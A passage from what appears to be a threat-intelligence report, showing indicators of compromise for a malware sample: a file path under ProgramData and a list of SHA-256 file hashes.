0x0E7302EC` | 1 \n`%ProgramData%\\skskjbpjx\\desktop.ini` | 1 \n \n#### File Hashes\n\n` 00922eea9dc5d3b1d91cf0e5b244d86957e0a5dab9f22b37db91983d154849f5 00e830529982d3b12b63616473f8e77b1e9f59d26d7464a916ab4ccb7d252338 0f9b382f50574eb1da03ab59cc0138d0cdddbcccdbf4fb04377235377e2bce60 19a17d03eaa9d66aee48704b368513cb4ce2ea571004561046897e5fe194fcb5 1d5a814d7034b2ffc16acb036e10021410d1592b491fd4e3c6737ffa48c19f55 205a780668f504064a7a326217529d3dd585fefe2c91b9ee141aa0c0411c88d6 2252337eb1ee8bfcdc05cdd90533c4f9c73326c3c38438730feffb47a67dde13 228cdf170c3b7f8c4b08f89def8b979c147aada601d7e1d0708916a3101732fc 23b79c36c6c5b9b35e11159486bf8f1e0a2366af780c9508bfee93de63fdeb86